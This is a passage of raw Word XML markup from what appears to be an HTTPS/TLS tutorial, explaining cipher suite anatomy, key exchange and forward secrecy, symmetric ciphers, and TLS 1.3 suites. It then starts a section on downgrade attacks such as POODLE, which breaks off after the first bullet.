          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. The Cipher Suite — What Gets Negotiated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1865FB43" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Anatomy of a Cipher Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B650698" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example (TLS 1.2):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBAB31D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E76145C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TLS       Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F7E970" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>ECDHE     Key Exchange (Elliptic Curve Diffie-Hellman Ephemeral)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC32344" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>RSA       Authentication (server proves identity with RSA signature)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C964F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>AES_256   Bulk Encryption (256-bit AES)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518F2DCA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>GCM       Mode of Operation (Galois/Counter Mode — AEAD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC7718" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>SHA384    Hash/PRF (used for key derivation and Finished messages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D1D652" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS 1.3 simplified naming:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> TLS_AES_256_GCM_SHA384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D17D257" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="918"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Key exchange is always ECDHE (only option).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ED498C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="918"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Authentication is from the certificate type (not in the cipher suite name).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2B2FBD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="918"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Only the symmetric cipher and hash are specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D3421F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Key Exchange Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C7EA6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RSA Key Exchange (removed in TLS 1.3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B3628C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="919"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client generates a random "pre-master secret."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D87032" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="919"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Encrypts it with the server's RSA public key (from certificate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5555181D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="919"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Sends encrypted blob to server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8AE43B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="919"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server decrypts with its private key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37628127" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="919"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> No forward secrecy. If the server's private key is later compromised, ALL past traffic (which was recorded) can be decrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59018737" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ECDHE (Elliptic Curve Diffie-Hellman Ephemeral):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAD1EDA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Both sides generate fresh (ephemeral) key pairs for each connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E854AD1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Exchange public keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A94018D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Compute shared secret independently (ECDH math).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0C5EF4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="920"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Forward secrecy:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Ephemeral keys are destroyed after use. Even if the server's certificate key is compromised, past sessions remain secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A3A396" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Popular curves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C78F62" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="921"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>x25519:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> 128-bit security. Fastest. Most widely used. Designed by Daniel Bernstein. Constant-time (resistant to timing attacks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D44690" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="921"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P-256 (secp256r1):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> 128-bit security. NIST standard. Slightly slower than x25519. Widely supported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A409B5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="921"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P-384 (secp384r1):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> 192-bit security. Required by some government standards (NSA Suite B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58154749" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.3 Symmetric Encryption (Bulk Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C8FE4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AES-GCM (most common):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5108E589" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="922"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>AES for confidentiality (block cipher in counter mode).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5A8C17" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="922"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>GMAC for integrity (Galois MAC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BD2798" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="922"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>AEAD (Authenticated Encryption with Associated Data): combines encryption + integrity in one operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A4D8DE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="922"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Hardware-accelerated on all modern CPUs (AES-NI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7320B727" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="922"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Available in 128-bit and 256-bit key sizes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491F52C5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ChaCha20-Poly1305 (alternative):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B7364B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="923"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>ChaCha20 for encryption (stream cipher).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAAB635" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="923"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Poly1305 for integrity (MAC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1CFCBA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="923"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Designed for software speed (fast on devices WITHOUT AES hardware acceleration — older mobile phones, embedded devices).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F182D95" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="923"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Comparable security to AES-256-GCM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9987F2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="923"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Used by Google (originally deployed for Android devices lacking AES-NI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26010816" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS 1.3 only allows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109FFE2D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="924"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TLS_AES_128_GCM_SHA256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E6B114" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="924"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TLS_AES_256_GCM_SHA384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012436F8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="924"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TLS_CHACHA20_POLY1305_SHA256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655D6E61" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="924"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TLS_AES_128_CCM_SHA256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C607879" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="924"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>TLS_AES_128_CCM_8_SHA256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFA9B37" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>All are AEAD. All have forward secrecy (ECDHE is mandatory). No weak options exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48215DFA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="55BB1578">
          <v:rect id="_x0000_i3987" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="431F2739" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Common HTTPS Vulnerabilities and Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3082A9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 Downgrade Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691155C6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The attack:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Force a connection to use weaker cryptography (older TLS version, weaker cipher).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914789A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POODLE (2014):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01638676" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="925"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Exploited SSL 3.0's CBC padding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622A2087" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
